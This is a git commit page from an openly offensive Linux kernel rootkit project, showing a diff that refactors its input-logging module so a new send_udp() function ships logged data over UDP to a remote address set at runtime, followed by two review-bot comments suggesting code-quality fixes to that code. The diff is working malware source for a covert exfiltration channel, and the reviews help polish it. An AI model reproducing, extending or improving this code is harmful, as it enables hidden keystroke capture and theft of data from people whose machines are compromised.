linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 58926084fb1fc1aed1db5752a8c9399b73b1e9ee
parent e6d2e27d9310c1d5a3e50144c7fbecbfd79b5c06
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 12 Dec 2020 16:35:12 +0100

refactors code

Diffstat:
Msrc/inputlog.c | 75+++++++++++++++++++++++++++++++++++++++++----------------------------------
Msrc/inputlog.h | 1+
2 files changed, 42 insertions(+), 34 deletions(-)

diff --git a/src/inputlog.c b/src/inputlog.c
@@ -11,6 +11,45 @@
 #define UDP_MAX_DATA_LEN 65507
 struct socket *sock;
+struct sockaddr_in addr, bind;
+
+void
+send_udp(char *buf, int buflen)
+{
+ int sent, packlen;
+ struct msghdr msg;
+ struct kvec iov;
+ mm_segment_t fs;
+
+ if (!sock)
+ return;
+
+ packlen = 0;
+ msg.msg_control = NULL;
+ msg.msg_controllen = 0;
+ msg.msg_flags = 0;
+ msg.msg_name = &addr;
+ msg.msg_namelen = sizeof(struct sockaddr_in);
+
+ while (buflen > 0) {
+ packlen = (buflen < UDP_MAX_DATA_LEN)
+ ? buflen : UDP_MAX_DATA_LEN;
+
+ iov.iov_len = packlen;
+ iov.iov_base = buf;
+
+ buflen -= packlen;
+ buf += packlen;
+
+ fs = get_fs();
+ set_fs(KERNEL_DS);
+ sent = kernel_sendmsg(sock, &msg, &iov, 1, packlen);
+ set_fs(fs);
+
+ if (sent > 0)
+ DEBUG_INFO("[g7] sent %d bytes\n", sent);
+ }
+}
 void
 log_input(const char *ip, const char *port)
@@ -20,12 +59,6 @@ log_input(const char *ip, const char *port)
 unsigned long ip_ul;
 unsigned long port_ul;
- int size;
- struct sockaddr_in addr, bind;
- struct msghdr msg;
- struct kvec iov;
- mm_segment_t fs;
-
 if (sock)
 return;
@@ -56,35 +89,9 @@ log_input(const char *ip, const char *port)
 }
 char *buf = "testing\ntesting\ntesting\ntesting";
- int buflen = strlen(buf), packlen = 0;
-
- msg.msg_control = NULL;
- msg.msg_controllen = 0;
- msg.msg_flags = 0;
- msg.msg_name = &addr;
- msg.msg_namelen = sizeof(struct sockaddr_in);
-
- while (buflen > 0) {
- packlen = (buflen < UDP_MAX_DATA_LEN)
- ? buflen : UDP_MAX_DATA_LEN;
-
- iov.iov_len = packlen;
- iov.iov_base = buf;
+ int buflen = strlen(buf);
- buflen -= packlen;
- buf += packlen;
-
- fs = get_fs();
- set_fs(KERNEL_DS);
- size = kernel_sendmsg(sock, &msg, &iov, 1, packlen);
- set_fs(fs);
-
- if (size > 0)
- DEBUG_INFO("[g7] sent %d bytes\n", size);
- }
-
- sock_release(sock);
- sock = NULL;
+ send_udp(buf, buflen);
 }
 void
diff --git a/src/inputlog.h b/src/inputlog.h
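Review bot: In the new send_udp() in src/inputlog.c, `struct msghdr msg` is a stack variable with only five members assigned, so every other member (on a 4.19 tree that includes `msg_iocb`) reaches kernel_sendmsg() holding whatever was on the kernel stack. Initialise it at the declaration, `struct msghdr msg = { .msg_name = &addr, .msg_namelen = sizeof(addr) };`, which zeroes the rest. The get_fs()/set_fs(KERNEL_DS) pair around kernel_sendmsg() looks unnecessary because that call already takes a `struct kvec` of kernel memory, and widening the address limit switches off user-pointer checks for everything that runs before it is restored, so it is safer to drop both lines. The new file-scope `struct sockaddr_in addr, bind;` has external linkage under very generic names; unless another translation unit needs them, declare them `static`.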
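Review bot: The last hunk of log_input() in src/inputlog.c removes `sock_release(sock); sock = NULL;` along with the moved send loop, so a commit titled "refactors code" also changes the socket's lifetime: it now stays open after log_input() returns. Whether it is ever released depends on code outside this diff (presumably unlog_input(), not visible here), so the change deserves a line in the commit message and a comment at the call site such as `/* sock intentionally left open; released in unlog_input() */` once that is confirmed. Separately, `char *buf` points at a string literal and is handed to `send_udp(char *, int)`; declaring both as `const char *` (with a cast at `iov.iov_base`) lets the compiler reject accidental writes. log_input() begins and ends outside this hunk.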
@@ -1,6 +1,7 @@
 #ifndef _GROUP7_INPUTLOG_H
 #define _GROUP7_INPUTLOG_H
+void send_udp(char *, int);
 void log_input(const char *, const char *);
 void unlog_input(void);